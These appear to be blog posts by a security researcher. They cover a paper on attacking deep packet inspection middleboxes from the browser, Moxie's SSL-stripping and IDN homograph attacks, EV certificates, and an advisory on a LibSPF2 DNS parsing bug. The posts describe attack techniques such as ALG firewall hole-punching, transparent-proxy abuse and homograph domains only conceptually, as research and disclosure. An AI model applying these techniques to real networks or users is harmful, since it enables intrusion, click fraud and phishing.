Slides from Cansec, replete with TCP NAT2NAT goodness.
(In my defense, this trick is way less hideous than my 2001 IP TTL game!)
I’m just going to come out and say it: I miss packet craft. Sure, we can always pull out Scapy, and slap amusing packets together, but everything interesting is always at the other layers.
Or is it?
For CanSecWest this year, I thought it’d be interesting to take a look at the realm of Deep Packet Inspectors. It turns out we were doing a lot of this around 2000 through 2002, and then…well, sort of stopped. So, in this year’s CanSecWest paper, “Staring Into The Abyss: Revisiting Browser v. Middleware Attacks In The Era Of Deep Packet Inspection” (DOC, PDF), I’m taking another crack at the realm — and I’m seeing really interesting capabilities to fingerprint, bypass, and otherwise manipulate systems that watch from the middle of networks, using protocol emulation abilities that have been part of browsers and their plugin ecosystem from the very beginning.
Ah, but here’s where I need some help. I’ve worked pretty closely with Robert Auger from Paypal, who just published his own paper, “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”. We independently discovered the HTTP component of this attack pattern, and as I describe in my paper, we’ve kind of forgotten just how much can be done against Active FTP Application Layer Gateways.
So, if I may ask, take a look, check out my paper, and if you have some thoughts, corrections, or interesting techniques, let me know so I can integrate them into my CanSecWest presentation. Here’s the full summary, to whet your appetite:
DPI — Deep Packet Inspection — technology is driving large amounts of intelligence into the infrastructure, parsing more and more context from data flows going past. Though this work may be necessary to support important business and even security requirements, we know from the history of security that to parse data is to potentially be vulnerable to that data – especially when the parser is designed to extract context as quickly as possible. Indeed, companies such as BreakingPoint and Codenomicon have made their names building test tools to expose potential faults with DPI engines. But could anyone actually trigger these vulnerabilities? In this paper, we restart an old line of research from several years ago: The use of in-browser technologies to “tweak” Deep Packet Inspection systems.
Essentially, by controlling both endpoints surrounding a DPI system, possibly using the TCP (and sometimes UDP) socket code that plugins add to browsers, what behavior can we extract? We find three lines of attack worth noting.
First, firewalls and NATs — the most widely deployed packet inspectors on the Internet today — can still be made to open firewall holes to the Internet by having the browser trigger the Application Layer Gateway (ALG) for protocols like Active FTP. We extend older work by integrating mechanisms for acquiring the correct internal IP address of a client, necessary for triggering many inspection engines, we survey other protocols such as SIP and H.323 that have their own inspection engines, and we explore better strategies for triggering these vulnerabilities without socket engines from browser plugins. We also explore a potentially new mechanism, “Window Dribbling”, that allows an HTTP POST from a browser to be converted into a full bidirectional conversation by only allowing a remote sender to “dribble” a fixed number of bytes per segment.
Second, we (along with Robert Auger at Paypal) find that transparent HTTP proxies, such as Squid, will “override” the intended destination of browser sockets, allowing a remote attacker to send and receive data from arbitrary web sites. This allows (at minimum) extensive and expensive click fraud attacks, and may expose internal connectivity as well (HTTP or even TCP).
Third, and most interestingly, we find that active DPI’s — those that actually alter the flow of traffic between a client and a server — all seem to expose subtly different parsers and handlers for the protocols they manipulate. These variations of behavior can be remotely fingerprinted, allowing an attacker to identify DPI platforms so as to correctly target his attacks. This capability, understood particularly in light of Felix Lindner’s recent work on generic attacks against Cisco infrastructure, underscores the need for both DPI vendors to test their platforms extensively, and for IT managers to deploy critical infrastructure patches with at least as much vigor as desktop support receives today.
For remediation purposes, we recommend two lines of defense – one policy, one technical. As a matter of policy, we find the most important recommendation of this paper that industry reconsiders patching policies as they apply to infrastructure, especially as that infrastructure starts inspecting traffic at ever higher speeds in ever deeper ways. We are actively concerned that administrators have internalized the need to patch endpoints, but aren’t closely tracking the equipment that binds endpoints together – despite their ever increasing intelligence. This is as much a recommendation to vendors – to build patches quickly, and to code audit and fuzz with software from companies like Breakingpoint and Codenomicon – as it is a plea to IT departments to deploy the patches that are generated. Also from a policy perspective, while this paper does recognize the need for judicious use of DPI technology, systems that are deployed across organizational boundaries have particular need for correctness. There have been incidents in the past that have led to security vulnerability across entire ISPs.
On the technical front, we defend the existence of socket functionality in the browser, recognizing that constraining all networking to that which existed in 2001 is not leading to more stable or more secure networks. We explore a solution that potentially allow firewalls to integrate socket policies into their ALG’s, encouraging plugin developers to eventually join in with browser manufacturers and build a single, coherent, cross-domain communication standard. We also discuss more advanced transparent proxy caching policies, which will prevent the Same Origin Policy bypasses discussed above. Finally, we remind home router developers that browsers are still able to access their web interfaces from the Internet, and that this exposure can be repaired by tying default password effectiveness to either a button on the device or a power cycle.
The firewall fingerprinter should be online shortly, with source code for you to play with as well. Thanks!
(Incidentally, yep, Source is this week, and I have something rather different in store for that event. The times, they are busy.)
So Crystal and the rest of Workhabit just threw another Unconference: Cloudcamp Seattle. I’m actually pretty impressed with the crowd — there’s representation from Amazon EC2, Windows Azure, and RightScale (who, non-ironically, have actually implemented Cloud on Cloud). Crystal asked if I’d be willing to do a Cloud Security talk. The Man couldn’t fly out, but here’s my thoughts on the cloud. Quick summary: There are ugly engineering (and procedural) issues we can’t actually ignore, mainly around escaping the management layer and the problem of intrusion disclosure, but:
a) This is such a superior way to deploy software, that I expect to see the necessary modifications to hardware and authentication technologies so as to obviate the threats in this deck, and
b) Private clouds are such an obvious value add that they’ll carry us through until the modifications are implemented.
I’ll throw video on as well if people want. Enjoy!
I’ll write more detailed commentary later, but here are the slides I recently presented at Black Hat.
I do need to make a post about DNSSEC at some point in the near future. But for now, I’d like to deal with the more immediate issue: Moxie’s SSL break.
You’ll note that’s not in quotes. There’s a pretty decent temptation to say Moxie’s attacks don’t “count”. Some of this comes from the fact that at the end of the day, these are his three attacks:
First, that when a site attempts to upgrade from HTTP to HTTPS, he can suppress the upgrade — possibly throwing in a “Lock” favicon which might trick the user.
Finally, Firefox‘s (not IE’s) defenses against Eric Johannsen’s IDN vulnerability could be bypassed by registering a domain and acquiring a wildcard cert in .cn.
The first two attacks have been discussed fairly extensively, while the third works in only one of the browsers. So there’s some grumbling. Lets talk about that.
When I gave my DNS Cache Poisoning talk last year, I devoted quite a few slides to the failings of SSL. To put it simply, there’s a reason I didn’t consider SSL a sufficient defense for DNS Cache Poisoning. Indeed, the fact that the 302 Redirect could be replaced with a 200 OK — replacing https://www.paypal.com with http://www.paypal.com — is right there on the first slide. (His favicon trick is neat though.) And a few slides later, I ended up quoting my 2006 talk with respect to online banks and their tragic use of weak security forms, replete with cutesy “lock” icons. Obviously I didn’t discover either of these attacks; they, and the rest of the litany of weaknesses described in my 2008 deck, have long been the sort of failings in SSL that we’ve all known are pretty deeply problematic.
But, at least the way I look at it, Moxie’s talk wasn’t about some “l33t new protocol flaw” in SSL. He’s traveled that ground — in 2002, his finding that a certificate for http://www.badguy.com could sign another certificate for http://www.bank.com via the non-enforcement of Basic Constraints is about as “l33t” as it gets. That’s been fixed for years though. This was instead a fairly searing critique about Security UI. Moxie introduced (to me anyway) the concept of Positive vs. Negative Feedback. Negative Feedback systems occur when the browser detects an out-and-out failure in the cryptography, and posits an error to the user. In response to the New Zealand bank data, in which 199 of 200 users ignored a negative prompt, browsers have been getting crazier and crazier about forcing users to jump through hoops in order to bypass a certificate error. The new negative errors are at the point where it is in fact easier to “balk” — to stop a web transaction, and move onto something else.
So Moxie’s putting his energy on the old positive feedback attacks — simply disabling the security, and seeing if anyone notices. And here he shows up with some pretty astonishing data: Nobody noticed. To be specific, absolutely 0% of users presented with missing encryption on important web sites, being asked to provide sensitive financial data to those websites, refused on the basis of missing security.
Wow. 0%. Seriously.
Why don’t users “get it”?
The most heartbreaking thing I think from Moxie’s entire deck is where he shows off what his attack does to Paypal, on an older browser. Paypal, more than most sites, has some paranoid, whip-smart engineers who really want to ship the most secure web experience possible for their service. As such, they have what’s probably the single most widely deployed SSL-only site. 100% of Paypal can, and must, be retrieved over SSL.
Unless there’s a bad guy in the way, faking the real Paypal content over HTTP. Then Paypal looks just like your bank.
That the insecurity of other sites would train users to not expect security on yours, was pretty cool (if sad) to see.
Where I do think things went a little off the tracks was when Moxie talked about his (pretty elegant) extension of Eric Johannsen’s IDN attacks. IDNs, or Internationalized Domain Names, exist to allow other languages the ability to have web sites in their native character sites, rather than shunting everything into ASCII. What Eric did in 2005 was show that he could acquire a certificate for http://www.paypal.com — with the a being the Cyrillic a — and thus acquire the “lock”, apparently linked to a near-pixel-perfect rendering of Paypal’s address bar. These so-called “Homograph” attacks were dealt with by locking down the rendering of other character sets in the address bar.
The problem — and it’s worth exploring, because it reflects just how tricky it is to satisfy all those other demands besides security — is that the trivial way to lock down the address bar, to simply ban Chinese and Cyrillic and everything else — has some pretty serious geopolitical implications. What, America gets to have its domain names, and China doesn’t? What’s up with that? Different browsers have dealt with this problem in different ways. I believe the way IE has handled this is to ask the operating system what language the OS is in, and allow Chinese browsers to view Chinese characters, Russian browsers to view Cyrillic characters, and so on. It appears Firefox handled this instead by saying that domains in *.cn may contain Chinese characters, domains in *.ru may contain Cyrillic characters, and so on.
But nothing stops Moxie, an American, from registering a *.cn domain, acquiring a *.ijjk.cn certificate, and using the Chinese character that looks exactly like a slash to make a fake http://www.bankofwhatever.com/foo/bar/foo.ijjk.cn domain. It’s a cute trick.
It’s also precisely what EV certificates exist to solve.
There’s an amazing amount of confusion around Extended Validation — EV. I can’t claim innocence here; I myself was pretty clueless about why they exist until fairly recently. Here’s the deal: Forget crazy tricks with chinese characters — bad guys have been registering names along the lines of http://www.bank-of-whatever.com or http://www.bankofwhateverinc.com or http://www.bankofamerica.com.xyzy.com for years, and then acquiring certificates for those names. Moxie’s attack is neat, but once you hit the semantic space, there’s practically an unlimited number of potential namespace collisions. EV exists, pretty much exclusively, to deal with the problem of these semantic collisions. It does four things:
1) It requires a solid certificate chain, as opposed to one containing MD5.
2) It requires a human lawyer, versed in the laws and language of a particular jurisdiction, to determine the implied corporate relationship from the domain name and declare it valid.
3) It applies a green background to the entire address bar (IE) or the leftmost side (Firefox), increasing the amount of “positive feedback” (as Moxie puts it) the user is hoped to demand
4) It explicitly inserts the human-lawyer-approved brand identity to the address bar, replete with a jurisdictional declaration. This also is there to add more positive feedback.
That’s what EV is for. It’s not at all there to deal with domain validated certs for http://www.bankofwhatever.com being incorrectly issued — see Adam Barth and Collin Jackson’s work in their paper, “Beware of Finer Grained Origins”. It’s not at all, as Moxie said in his talk, “Just the validation that CA’s should have been doing already”. Verisign et al have built an extensive, new positive feedback layer to deal with real world phishing attacks that, while not as elegant as Moxie’s Chinese Slash, were no less effective.
The real question, in the wake of Moxie’s work, is do we have data that shows users notice the missing green bar, and the missing brand identity? Or, even with EV sites, do users still ignore the missing security markings? I’m looking forward to seeing the data.
I really need to learn to leave DNS alone
DNS TXT Record Parsing Bug in LibSPF2
A relatively common bug parsing TXT records delivered over DNS, dating at least back to 2002 in Sendmail 8.2.0 and almost certainly much earlier, has been found in LibSPF2, a library frequently used to retrieve SPF (Sender Policy Framework) records and apply policy according to those records. This implementation flaw allows for relatively flexible memory corruption, and should thus be treated as a path to anonymous remote code execution. Of particular note is that the remote code execution would occur on servers specifically designed to receive E-Mail from the Internet, and that these systems may in fact be high volume mail exchangers. This creates privacy implications. It is also the case that a corrupted email server is a useful “jumping off” point for attackers to corrupt desktop machines, since attachments can be corrupted with malware while the containing message stays intact. So there are internal security implications as well, above and beyond corruption of the mail server on the DMZ.
Apparently LibSPF2 is actually used to secure quite a bit of mail traffic – there’s a lot of SPAM out there. Fix is out, see http://www.libspf2.org/index.html or your friendly neighborhood distro. Thanks to Shevek, CERT (VU#183657), Ken Simpson of MailChannels, Andre Engel, Scott Kitterman, and Hannah Schroeter for their help with this.
Edit: Special thanks, incidentally, to Coverity, who upon hearing that there was one bug, ran their static analyzer on LibSPF2 and found six more. Cool!
Someone asked for a cite on the Consumer Reports claims in my Black Hat 2008 slides. I went and tracked this down, and I actually picked this up from the Meandering Wildly blog. Looks like I misread this a bit — a previous dataset had come from Consumer Reports, but the data in my Black Hat deck actually came from Venafi, a security firm that specializes in systems management. Some collateral with more of their SSL data is here. Their methodology for collecting the data, according to Meandering Wildly:
It’s a phone poll, so it’s subject to standard errors of self-reporting, and their margin of error (2.5%) is given for a 0.1 confidence interval, which is a little slack for my tastes, but they have a large (N>1000), US-Census-representative sample, which maybe gives us intellectual permission enough to keep playing.
Of course, I also spoke about the one case we have hard data on — when the New Zealand bank’s cert went bad, and 99% of people didn’t care. Information on that case can be found here. I do wonder how these numbers might be changing in light of IE8 and FF3′s dramatically improved invalid SSL certificate experiences.
In general, anything I claim, I’m only too happy to back up, so if you have any questions regarding any of the details from a talk I’ve given, don’t hesitate to ask.